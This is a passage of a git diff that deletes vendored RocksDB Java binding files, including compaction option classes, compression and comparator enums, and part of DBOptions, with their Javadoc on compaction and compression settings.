-   *
-   * @return the soft limit on the number of level-0 files.
-   */
-  int levelZeroSlowdownWritesTrigger();
-
-  /**
-   * Maximum number of level-0 files.  We stop writes at this point.
-   *
-   * @param numFiles the hard limit of the number of level-0 files.
-   * @return the reference to the current option.
-   */
-  T setLevelZeroStopWritesTrigger(int numFiles);
-
-  /**
-   * Maximum number of level-0 files.  We stop writes at this point.
-   *
-   * @return the hard limit of the number of level-0 file.
-   */
-  int levelZeroStopWritesTrigger();
-
-  /**
-   * The ratio between the total size of level-(L+1) files and the total
-   * size of level-L files for all L.
-   * DEFAULT: 10
-   *
-   * @param multiplier the ratio between the total size of level-(L+1)
-   *     files and the total size of level-L files for all L.
-   * @return the reference to the current option.
-   */
-  T setMaxBytesForLevelMultiplier(
-      double multiplier);
-
-  /**
-   * The ratio between the total size of level-(L+1) files and the total
-   * size of level-L files for all L.
-   * DEFAULT: 10
-   *
-   * @return the ratio between the total size of level-(L+1) files and
-   *     the total size of level-L files for all L.
-   */
-  double maxBytesForLevelMultiplier();
-
-  /**
-   * FIFO compaction option.
-   * The oldest table file will be deleted
-   * once the sum of table files reaches this size.
-   * The default value is 1GB (1 * 1024 * 1024 * 1024).
-   *
-   * @param maxTableFilesSize the size limit of the total sum of table files.
-   * @return the instance of the current object.
-   */
-  T setMaxTableFilesSizeFIFO(
-      long maxTableFilesSize);
-
-  /**
-   * FIFO compaction option.
-   * The oldest table file will be deleted
-   * once the sum of table files reaches this size.
-   * The default value is 1GB (1 * 1024 * 1024 * 1024).
-   *
-   * @return the size limit of the total sum of table files.
-   */
-  long maxTableFilesSizeFIFO();
-
-  /**
-   * Get the config for mem-table.
-   *
-   * @return the mem-table config.
-   */
-  MemTableConfig memTableConfig();
-
-  /**
-   * Set the config for mem-table.
-   *
-   * @param memTableConfig the mem-table config.
-   * @return the instance of the current object.
-   * @throws java.lang.IllegalArgumentException thrown on 32-Bit platforms
-   *   while overflowing the underlying platform specific value.
-   */
-  T setMemTableConfig(MemTableConfig memTableConfig);
-
-  /**
-   * Returns the name of the current mem table representation.
-   * Memtable format can be set using setTableFormatConfig.
-   *
-   * @return the name of the currently-used memtable factory.
-   * @see #setTableFormatConfig(org.rocksdb.TableFormatConfig)
-   */
-  String memTableFactoryName();
-
-  /**
-   * Get the config for table format.
-   *
-   * @return the table format config.
-   */
-  TableFormatConfig tableFormatConfig();
-
-  /**
-   * Set the config for table format.
-   *
-   * @param config the table format config.
-   * @return the reference of the current options.
-   */
-  T setTableFormatConfig(TableFormatConfig config);
-
-  /**
-   * @return the name of the currently used table factory.
-   */
-  String tableFactoryName();
-
-  /**
-   * Compression algorithm that will be used for the bottommost level that
-   * contain files. If level-compaction is used, this option will only affect
-   * levels after base level.
-   *
-   * Default: {@link CompressionType#DISABLE_COMPRESSION_OPTION}
-   *
-   * @param bottommostCompressionType  The compression type to use for the
-   *     bottommost level
-   *
-   * @return the reference of the current options.
-   */
-  T setBottommostCompressionType(
-      final CompressionType bottommostCompressionType);
-
-  /**
-   * Compression algorithm that will be used for the bottommost level that
-   * contain files. If level-compaction is used, this option will only affect
-   * levels after base level.
-   *
-   * Default: {@link CompressionType#DISABLE_COMPRESSION_OPTION}
-   *
-   * @return The compression type used for the bottommost level
-   */
-  CompressionType bottommostCompressionType();
-
-
-  /**
-   * Set the different options for compression algorithms
-   *
-   * @param compressionOptions The compression options
-   *
-   * @return the reference of the current options.
-   */
-  T setCompressionOptions(
-      CompressionOptions compressionOptions);
-
-  /**
-   * Get the different options for compression algorithms
-   *
-   * @return The compression options
-   */
-  CompressionOptions compressionOptions();
-
-  /**
-   * Default memtable memory budget used with the following methods:
-   *
-   * <ol>
-   *   <li>{@link #optimizeLevelStyleCompaction()}</li>
-   *   <li>{@link #optimizeUniversalStyleCompaction()}</li>
-   * </ol>
-   */
-  long DEFAULT_COMPACTION_MEMTABLE_MEMORY_BUDGET = 512 * 1024 * 1024;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionOptionsFIFO.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionOptionsFIFO.java
deleted file mode 100644
index f795807..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionOptionsFIFO.java
+++ /dev/null
@@ -1,50 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Options for FIFO Compaction
- */
-public class CompactionOptionsFIFO extends RocksObject {
-
-  public CompactionOptionsFIFO() {
-    super(newCompactionOptionsFIFO());
-  }
-
-  /**
-   * Once the total sum of table files reaches this, we will delete the oldest
-   * table file
-   *
-   * Default: 1GB
-   *
-   * @param maxTableFilesSize The maximum size of the table files
-   *
-   * @return the reference to the current options.
-   */
-  public CompactionOptionsFIFO setMaxTableFilesSize(
-      final long maxTableFilesSize) {
-    setMaxTableFilesSize(nativeHandle_, maxTableFilesSize);
-    return this;
-  }
-
-  /**
-   * Once the total sum of table files reaches this, we will delete the oldest
-   * table file
-   *
-   * Default: 1GB
-   *
-   * @return max table file size in bytes
-   */
-  public long maxTableFilesSize() {
-    return maxTableFilesSize(nativeHandle_);
-  }
-
-  private native void setMaxTableFilesSize(long handle, long maxTableFilesSize);
-  private native long maxTableFilesSize(long handle);
-
-  private native static long newCompactionOptionsFIFO();
-  @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionOptionsUniversal.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionOptionsUniversal.java
deleted file mode 100644
index d2dfa4e..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionOptionsUniversal.java
+++ /dev/null
@@ -1,273 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Options for Universal Compaction
- */
-public class CompactionOptionsUniversal extends RocksObject {
-
-  public CompactionOptionsUniversal() {
-    super(newCompactionOptionsUniversal());
-  }
-
-  /**
-   * Percentage flexibility while comparing file size. If the candidate file(s)
-   * size is 1% smaller than the next file's size, then include next file into
-   * this candidate set.
-   *
-   * Default: 1
-   *
-   * @param sizeRatio The size ratio to use
-   *
-   * @return the reference to the current options.
-   */
-  public CompactionOptionsUniversal setSizeRatio(final int sizeRatio) {
-    setSizeRatio(nativeHandle_, sizeRatio);
-    return this;
-  }
-
-  /**
-   * Percentage flexibility while comparing file size. If the candidate file(s)
-   * size is 1% smaller than the next file's size, then include next file into
-   * this candidate set.
-   *
-   * Default: 1
-   *
-   * @return The size ratio in use
-   */
-  public int sizeRatio() {
-    return sizeRatio(nativeHandle_);
-  }
-
-  /**
-   * The minimum number of files in a single compaction run.
-   *
-   * Default: 2
-   *
-   * @param minMergeWidth minimum number of files in a single compaction run
-   *
-   * @return the reference to the current options.
-   */
-  public CompactionOptionsUniversal setMinMergeWidth(final int minMergeWidth) {
-    setMinMergeWidth(nativeHandle_, minMergeWidth);
-    return this;
-  }
-
-  /**
-   * The minimum number of files in a single compaction run.
-   *
-   * Default: 2
-   *
-   * @return minimum number of files in a single compaction run
-   */
-  public int minMergeWidth() {
-    return minMergeWidth(nativeHandle_);
-  }
-
-  /**
-   * The maximum number of files in a single compaction run.
-   *
-   * Default: {@link Long#MAX_VALUE}
-   *
-   * @param maxMergeWidth maximum number of files in a single compaction run
-   *
-   * @return the reference to the current options.
-   */
-  public CompactionOptionsUniversal setMaxMergeWidth(final int maxMergeWidth) {
-    setMaxMergeWidth(nativeHandle_, maxMergeWidth);
-    return this;
-  }
-
-  /**
-   * The maximum number of files in a single compaction run.
-   *
-   * Default: {@link Long#MAX_VALUE}
-   *
-   * @return maximum number of files in a single compaction run
-   */
-  public int maxMergeWidth() {
-    return maxMergeWidth(nativeHandle_);
-  }
-
-  /**
-   * The size amplification is defined as the amount (in percentage) of
-   * additional storage needed to store a single byte of data in the database.
-   * For example, a size amplification of 2% means that a database that
-   * contains 100 bytes of user-data may occupy upto 102 bytes of
-   * physical storage. By this definition, a fully compacted database has
-   * a size amplification of 0%. Rocksdb uses the following heuristic
-   * to calculate size amplification: it assumes that all files excluding
-   * the earliest file contribute to the size amplification.
-   *
-   * Default: 200, which means that a 100 byte database could require upto
-   * 300 bytes of storage.
-   *
-   * @param maxSizeAmplificationPercent the amount of additional storage needed
-   *     (as a percentage) to store a single byte in the database
-   *
-   * @return the reference to the current options.
-   */
-  public CompactionOptionsUniversal setMaxSizeAmplificationPercent(
-      final int maxSizeAmplificationPercent) {
-    setMaxSizeAmplificationPercent(nativeHandle_, maxSizeAmplificationPercent);
-    return this;
-  }
-
-  /**
-   * The size amplification is defined as the amount (in percentage) of
-   * additional storage needed to store a single byte of data in the database.
-   * For example, a size amplification of 2% means that a database that
-   * contains 100 bytes of user-data may occupy upto 102 bytes of
-   * physical storage. By this definition, a fully compacted database has
-   * a size amplification of 0%. Rocksdb uses the following heuristic
-   * to calculate size amplification: it assumes that all files excluding
-   * the earliest file contribute to the size amplification.
-   *
-   * Default: 200, which means that a 100 byte database could require upto
-   * 300 bytes of storage.
-   *
-   * @return the amount of additional storage needed (as a percentage) to store
-   *     a single byte in the database
-   */
-  public int maxSizeAmplificationPercent() {
-    return maxSizeAmplificationPercent(nativeHandle_);
-  }
-
-  /**
-   * If this option is set to be -1 (the default value), all the output files
-   * will follow compression type specified.
-   *
-   * If this option is not negative, we will try to make sure compressed
-   * size is just above this value. In normal cases, at least this percentage
-   * of data will be compressed.
-   *
-   * When we are compacting to a new file, here is the criteria whether
-   * it needs to be compressed: assuming here are the list of files sorted
-   * by generation time:
-   *    A1...An B1...Bm C1...Ct
-   * where A1 is the newest and Ct is the oldest, and we are going to compact
-   * B1...Bm, we calculate the total size of all the files as total_size, as
-   * well as  the total size of C1...Ct as total_C, the compaction output file
-   * will be compressed iff
-   *    total_C / total_size &lt; this percentage
-   *
-   * Default: -1
-   *
-   * @param compressionSizePercent percentage of size for compression
-   *
-   * @return the reference to the current options.
-   */
-  public CompactionOptionsUniversal setCompressionSizePercent(
-      final int compressionSizePercent) {
-    setCompressionSizePercent(nativeHandle_, compressionSizePercent);
-    return this;
-  }
-
-  /**
-   * If this option is set to be -1 (the default value), all the output files
-   * will follow compression type specified.
-   *
-   * If this option is not negative, we will try to make sure compressed
-   * size is just above this value. In normal cases, at least this percentage
-   * of data will be compressed.
-   *
-   * When we are compacting to a new file, here is the criteria whether
-   * it needs to be compressed: assuming here are the list of files sorted
-   * by generation time:
-   *    A1...An B1...Bm C1...Ct
-   * where A1 is the newest and Ct is the oldest, and we are going to compact
-   * B1...Bm, we calculate the total size of all the files as total_size, as
-   * well as  the total size of C1...Ct as total_C, the compaction output file
-   * will be compressed iff
-   *    total_C / total_size &lt; this percentage
-   *
-   * Default: -1
-   *
-   * @return percentage of size for compression
-   */
-  public int compressionSizePercent() {
-    return compressionSizePercent(nativeHandle_);
-  }
-
-  /**
-   * The algorithm used to stop picking files into a single compaction run
-   *
-   * Default: {@link CompactionStopStyle#CompactionStopStyleTotalSize}
-   *
-   * @param compactionStopStyle The compaction algorithm
-   *
-   * @return the reference to the current options.
-   */
-  public CompactionOptionsUniversal setStopStyle(
-      final CompactionStopStyle compactionStopStyle) {
-    setStopStyle(nativeHandle_, compactionStopStyle.getValue());
-    return this;
-  }
-
-  /**
-   * The algorithm used to stop picking files into a single compaction run
-   *
-   * Default: {@link CompactionStopStyle#CompactionStopStyleTotalSize}
-   *
-   * @return The compaction algorithm
-   */
-  public CompactionStopStyle stopStyle() {
-    return CompactionStopStyle.getCompactionStopStyle(stopStyle(nativeHandle_));
-  }
-
-  /**
-   * Option to optimize the universal multi level compaction by enabling
-   * trivial move for non overlapping files.
-   *
-   * Default: false
-   *
-   * @param allowTrivialMove true if trivial move is allowed
-   *
-   * @return the reference to the current options.
-   */
-  public CompactionOptionsUniversal setAllowTrivialMove(
-      final boolean allowTrivialMove) {
-    setAllowTrivialMove(nativeHandle_, allowTrivialMove);
-    return this;
-  }
-
-  /**
-   * Option to optimize the universal multi level compaction by enabling
-   * trivial move for non overlapping files.
-   *
-   * Default: false
-   *
-   * @return true if trivial move is allowed
-   */
-  public boolean allowTrivialMove() {
-    return allowTrivialMove(nativeHandle_);
-  }
-
-  private native static long newCompactionOptionsUniversal();
-  @Override protected final native void disposeInternal(final long handle);
-
-  private native void setSizeRatio(final long handle, final int sizeRatio);
-  private native int sizeRatio(final long handle);
-  private native void setMinMergeWidth(
-      final long handle, final int minMergeWidth);
-  private native int minMergeWidth(final long handle);
-  private native void setMaxMergeWidth(
-      final long handle, final int maxMergeWidth);
-  private native int maxMergeWidth(final long handle);
-  private native void setMaxSizeAmplificationPercent(
-      final long handle, final int maxSizeAmplificationPercent);
-  private native int maxSizeAmplificationPercent(final long handle);
-  private native void setCompressionSizePercent(
-      final long handle, final int compressionSizePercent);
-  private native int compressionSizePercent(final long handle);
-  private native void setStopStyle(
-      final long handle, final byte stopStyle);
-  private native byte stopStyle(final long handle);
-  private native void setAllowTrivialMove(
-      final long handle, final boolean allowTrivialMove);
-  private native boolean allowTrivialMove(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionPriority.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionPriority.java
deleted file mode 100644
index a4f53cd..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionPriority.java
+++ /dev/null
@@ -1,73 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Compaction Priorities
- */
-public enum CompactionPriority {
-
-  /**
-   * Slightly Prioritize larger files by size compensated by #deletes
-   */
-  ByCompensatedSize((byte)0x0),
-
-  /**
-   * First compact files whose data's latest update time is oldest.
-   * Try this if you only update some hot keys in small ranges.
-   */
-  OldestLargestSeqFirst((byte)0x1),
-
-  /**
-   * First compact files whose range hasn't been compacted to the next level
-   * for the longest. If your updates are random across the key space,
-   * write amplification is slightly better with this option.
-   */
-  OldestSmallestSeqFirst((byte)0x2),
-
-  /**
-   * First compact files whose ratio between overlapping size in next level
-   * and its size is the smallest. It in many cases can optimize write
-   * amplification.
-   */
-  MinOverlappingRatio((byte)0x3);
-
-
-  private final byte value;
-
-  CompactionPriority(final byte value) {
-    this.value = value;
-  }
-
-  /**
-   * Returns the byte value of the enumerations value
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value;
-  }
-
-  /**
-   * Get CompactionPriority by byte value.
-   *
-   * @param value byte representation of CompactionPriority.
-   *
-   * @return {@link org.rocksdb.CompactionPriority} instance or null.
-   * @throws java.lang.IllegalArgumentException if an invalid
-   *     value is provided.
-   */
-  public static CompactionPriority getCompactionPriority(final byte value) {
-    for (final CompactionPriority compactionPriority :
-        CompactionPriority.values()) {
-      if (compactionPriority.getValue() == value){
-        return compactionPriority;
-      }
-    }
-    throw new IllegalArgumentException(
-        "Illegal value provided for CompactionPriority.");
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionStopStyle.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionStopStyle.java
deleted file mode 100644
index 13cc873..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionStopStyle.java
+++ /dev/null
@@ -1,54 +0,0 @@
-package org.rocksdb;
-
-/**
- * Algorithm used to make a compaction request stop picking new files
- * into a single compaction run
- */
-public enum CompactionStopStyle {
-
-  /**
-   * Pick files of similar size
-   */
-  CompactionStopStyleSimilarSize((byte)0x0),
-
-  /**
-   * Total size of picked files &gt; next file
-   */
-  CompactionStopStyleTotalSize((byte)0x1);
-
-
-  private final byte value;
-
-  CompactionStopStyle(final byte value) {
-    this.value = value;
-  }
-
-  /**
-   * Returns the byte value of the enumerations value
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value;
-  }
-
-  /**
-   * Get CompactionStopStyle by byte value.
-   *
-   * @param value byte representation of CompactionStopStyle.
-   *
-   * @return {@link org.rocksdb.CompactionStopStyle} instance or null.
-   * @throws java.lang.IllegalArgumentException if an invalid
-   *     value is provided.
-   */
-  public static CompactionStopStyle getCompactionStopStyle(final byte value) {
-    for (final CompactionStopStyle compactionStopStyle :
-        CompactionStopStyle.values()) {
-      if (compactionStopStyle.getValue() == value){
-        return compactionStopStyle;
-      }
-    }
-    throw new IllegalArgumentException(
-        "Illegal value provided for CompactionStopStyle.");
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionStyle.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionStyle.java
deleted file mode 100644
index 5e13363..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionStyle.java
+++ /dev/null
@@ -1,52 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Enum CompactionStyle
- *
- * RocksDB supports different styles of compaction. Available
- * compaction styles can be chosen using this enumeration.
- *
- * <ol>
- *   <li><strong>LEVEL</strong> - Level based Compaction style</li>
- *   <li><strong>UNIVERSAL</strong> - Universal Compaction Style is a
- *   compaction style, targeting the use cases requiring lower write
- *   amplification, trading off read amplification and space
- *   amplification.</li>
- *   <li><strong>FIFO</strong> - FIFO compaction style is the simplest
- *   compaction strategy. It is suited for keeping event log data with
- *   very low overhead (query log for example). It periodically deletes
- *   the old data, so it's basically a TTL compaction style.</li>
- * </ol>
- *
- * @see <a
- * href="https://github.com/facebook/rocksdb/wiki/Universal-Compaction">
- * Universal Compaction</a>
- * @see <a
- * href="https://github.com/facebook/rocksdb/wiki/FIFO-compaction-style">
- * FIFO Compaction</a>
- */
-public enum CompactionStyle {
-  LEVEL((byte) 0),
-  UNIVERSAL((byte) 1),
-  FIFO((byte) 2);
-
-  private final byte value_;
-
-  private CompactionStyle(byte value) {
-    value_ = value;
-  }
-
-  /**
-   * Returns the byte value of the enumerations value
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value_;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Comparator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Comparator.java
deleted file mode 100644
index 817e00f..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Comparator.java
+++ /dev/null
@@ -1,32 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Base class for comparators which will receive
- * byte[] based access via org.rocksdb.Slice in their
- * compare method implementation.
- *
- * byte[] based slices perform better when small keys
- * are involved. When using larger keys consider
- * using @see org.rocksdb.DirectComparator
- */
-public abstract class Comparator extends AbstractComparator<Slice> {
-
-  private final long nativeHandle_;
-
-  public Comparator(final ComparatorOptions copt) {
-    super();
-    this.nativeHandle_ = createNewComparator0(copt.nativeHandle_);
-  }
-
-  @Override
-  protected final long getNativeHandle() {
-    return nativeHandle_;
-  }
-
-  private native long createNewComparator0(final long comparatorOptionsHandle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ComparatorOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ComparatorOptions.java
deleted file mode 100644
index 3a05bef..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ComparatorOptions.java
+++ /dev/null
@@ -1,51 +0,0 @@
-package org.rocksdb;
-
-/**
- * This class controls the behaviour
- * of Java implementations of
- * AbstractComparator
- *
- * Note that dispose() must be called before a ComparatorOptions
- * instance becomes out-of-scope to release the allocated memory in C++.
- */
-public class ComparatorOptions extends RocksObject {
-  public ComparatorOptions() {
-    super(newComparatorOptions());
-  }
-
-  /**
-   * Use adaptive mutex, which spins in the user space before resorting
-   * to kernel. This could reduce context switch when the mutex is not
-   * heavily contended. However, if the mutex is hot, we could end up
-   * wasting spin time.
-   * Default: false
-   *
-   * @return true if adaptive mutex is used.
-   */
-  public boolean useAdaptiveMutex() {
-    assert(isOwningHandle());
-    return useAdaptiveMutex(nativeHandle_);
-  }
-
-  /**
-   * Use adaptive mutex, which spins in the user space before resorting
-   * to kernel. This could reduce context switch when the mutex is not
-   * heavily contended. However, if the mutex is hot, we could end up
-   * wasting spin time.
-   * Default: false
-   *
-   * @param useAdaptiveMutex true if adaptive mutex is used.
-   * @return the reference to the current comparator options.
-   */
-  public ComparatorOptions setUseAdaptiveMutex(final boolean useAdaptiveMutex) {
-    assert (isOwningHandle());
-    setUseAdaptiveMutex(nativeHandle_, useAdaptiveMutex);
-    return this;
-  }
-
-  private native static long newComparatorOptions();
-  private native boolean useAdaptiveMutex(final long handle);
-  private native void setUseAdaptiveMutex(final long handle,
-      final boolean useAdaptiveMutex);
-  @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompressionOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompressionOptions.java
deleted file mode 100644
index 4927770..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompressionOptions.java
+++ /dev/null
@@ -1,85 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Options for Compression
- */
-public class CompressionOptions extends RocksObject {
-
-  public CompressionOptions() {
-    super(newCompressionOptions());
-  }
-
-  public CompressionOptions setWindowBits(final int windowBits) {
-    setWindowBits(nativeHandle_, windowBits);
-    return this;
-  }
-
-  public int windowBits() {
-    return windowBits(nativeHandle_);
-  }
-
-  public CompressionOptions setLevel(final int level) {
-    setLevel(nativeHandle_, level);
-    return this;
-  }
-
-  public int level() {
-    return level(nativeHandle_);
-  }
-
-  public CompressionOptions setStrategy(final int strategy) {
-    setStrategy(nativeHandle_, strategy);
-    return this;
-  }
-
-  public int strategy() {
-    return strategy(nativeHandle_);
-  }
-
-  /**
-   * Maximum size of dictionary used to prime the compression library. Currently
-   * this dictionary will be constructed by sampling the first output file in a
-   * subcompaction when the target level is bottommost. This dictionary will be
-   * loaded into the compression library before compressing/uncompressing each
-   * data block of subsequent files in the subcompaction. Effectively, this
-   * improves compression ratios when there are repetitions across data blocks.
-   *
-   * A value of 0 indicates the feature is disabled.
-   *
-   * Default: 0.
-   *
-   * @param maxDictBytes Maximum bytes to use for the dictionary
-   *
-   * @return the reference to the current options
-   */
-  public CompressionOptions setMaxDictBytes(final int maxDictBytes) {
-    setMaxDictBytes(nativeHandle_, maxDictBytes);
-    return this;
-  }
-
-  /**
-   * Maximum size of dictionary used to prime the compression library.
-   *
-   * @return The maximum bytes to use for the dictionary
-   */
-  public int maxDictBytes() {
-    return maxDictBytes(nativeHandle_);
-  }
-
-  private native static long newCompressionOptions();
-  @Override protected final native void disposeInternal(final long handle);
-
-  private native void setWindowBits(final long handle, final int windowBits);
-  private native int windowBits(final long handle);
-  private native void setLevel(final long handle, final int level);
-  private native int level(final long handle);
-  private native void setStrategy(final long handle, final int strategy);
-  private native int strategy(final long handle);
-  private native void setMaxDictBytes(final long handle, final int maxDictBytes);
-  private native int maxDictBytes(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompressionType.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompressionType.java
deleted file mode 100644
index 2781537..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompressionType.java
+++ /dev/null
@@ -1,99 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Enum CompressionType
- *
- * <p>DB contents are stored in a set of blocks, each of which holds a
- * sequence of key,value pairs. Each block may be compressed before
- * being stored in a file. The following enum describes which
- * compression method (if any) is used to compress a block.</p>
- */
-public enum CompressionType {
-
-  NO_COMPRESSION((byte) 0x0, null),
-  SNAPPY_COMPRESSION((byte) 0x1, "snappy"),
-  ZLIB_COMPRESSION((byte) 0x2, "z"),
-  BZLIB2_COMPRESSION((byte) 0x3, "bzip2"),
-  LZ4_COMPRESSION((byte) 0x4, "lz4"),
-  LZ4HC_COMPRESSION((byte) 0x5, "lz4hc"),
-  XPRESS_COMPRESSION((byte) 0x6, "xpress"),
-  ZSTD_COMPRESSION((byte)0x7, "zstd"),
-  DISABLE_COMPRESSION_OPTION((byte)0x7F, null);
-
-  /**
-   * <p>Get the CompressionType enumeration value by
-   * passing the library name to this method.</p>
-   *
-   * <p>If library cannot be found the enumeration
-   * value {@code NO_COMPRESSION} will be returned.</p>
-   *
-   * @param libraryName compression library name.
-   *
-   * @return CompressionType instance.
-   */
-  public static CompressionType getCompressionType(String libraryName) {
-    if (libraryName != null) {
-      for (CompressionType compressionType : CompressionType.values()) {
-        if (compressionType.getLibraryName() != null &&
-            compressionType.getLibraryName().equals(libraryName)) {
-          return compressionType;
-        }
-      }
-    }
-    return CompressionType.NO_COMPRESSION;
-  }
-
-  /**
-   * <p>Get the CompressionType enumeration value by
-   * passing the byte identifier to this method.</p>
-   *
-   * @param byteIdentifier of CompressionType.
-   *
-   * @return CompressionType instance.
-   *
-   * @throws IllegalArgumentException If CompressionType cannot be found for the
-   *   provided byteIdentifier
-   */
-  public static CompressionType getCompressionType(byte byteIdentifier) {
-    for (final CompressionType compressionType : CompressionType.values()) {
-      if (compressionType.getValue() == byteIdentifier) {
-        return compressionType;
-      }
-    }
-
-    throw new IllegalArgumentException(
-        "Illegal value provided for CompressionType.");
-  }
-
-  /**
-   * <p>Returns the byte value of the enumerations value.</p>
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value_;
-  }
-
-  /**
-   * <p>Returns the library name of the compression type
-   * identified by the enumeration value.</p>
-   *
-   * @return library name
-   */
-  public String getLibraryName() {
-    return libraryName_;
-  }
-
-  CompressionType(final byte value, final String libraryName) {
-    value_ = value;
-    libraryName_ = libraryName;
-  }
-
-  private final byte value_;
-  private final String libraryName_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DBOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DBOptions.java
deleted file mode 100644
index 14f0c6c..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DBOptions.java
+++ /dev/null
@@ -1,1120 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.nio.file.Paths;
-import java.util.*;
-
-/**
- * DBOptions to control the behavior of a database.  It will be used
- * during the creation of a {@link org.rocksdb.RocksDB} (i.e., RocksDB.open()).
- *
- * If {@link #dispose()} function is not called, then it will be GC'd
- * automatically and native resources will be released as part of the process.
- */
-public class DBOptions
-    extends RocksObject implements DBOptionsInterface<DBOptions> {
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  /**
-   * Construct DBOptions.
-   *
-   * This constructor will create (by allocating a block of memory)
-   * an {@code rocksdb::DBOptions} in the c++ side.
-   */
-  public DBOptions() {
-    super(newDBOptions());
-    numShardBits_ = DEFAULT_NUM_SHARD_BITS;
-  }
-
-  /**
-   * <p>Method to get a options instance by using pre-configured
-   * property values. If one or many values are undefined in
-   * the context of RocksDB the method will return a null
-   * value.</p>
-   *
-   * <p><strong>Note</strong>: Property keys can be derived from
-   * getter methods within the options class. Example: the method
-   * {@code allowMmapReads()} has a property key:
-   * {@code allow_mmap_reads}.</p>
-   *
-   * @param properties {@link java.util.Properties} instance.
-   *
-   * @return {@link org.rocksdb.DBOptions instance}
-   *     or null.
-   *
-   * @throws java.lang.IllegalArgumentException if null or empty
-   *     {@link java.util.Properties} instance is passed to the method call.
-   */
-  public static DBOptions getDBOptionsFromProps(
-      final Properties properties) {
-    if (properties == null || properties.size() == 0) {
-      throw new IllegalArgumentException(
-          "Properties value must contain at least one value.");
-    }
-    DBOptions dbOptions = null;
-    StringBuilder stringBuilder = new StringBuilder();
-    for (final String name : properties.stringPropertyNames()){
-      stringBuilder.append(name);
-      stringBuilder.append("=");
-      stringBuilder.append(properties.getProperty(name));
-      stringBuilder.append(";");
-    }
-    long handle = getDBOptionsFromProps(
-        stringBuilder.toString());
-    if (handle != 0){
-      dbOptions = new DBOptions(handle);
-    }
-    return dbOptions;
-  }
-
-  @Override
-  public DBOptions optimizeForSmallDb() {
-    optimizeForSmallDb(nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public DBOptions setIncreaseParallelism(
-      final int totalThreads) {
-    assert(isOwningHandle());
-    setIncreaseParallelism(nativeHandle_, totalThreads);
-    return this;
-  }
-
-  @Override
-  public DBOptions setCreateIfMissing(final boolean flag) {
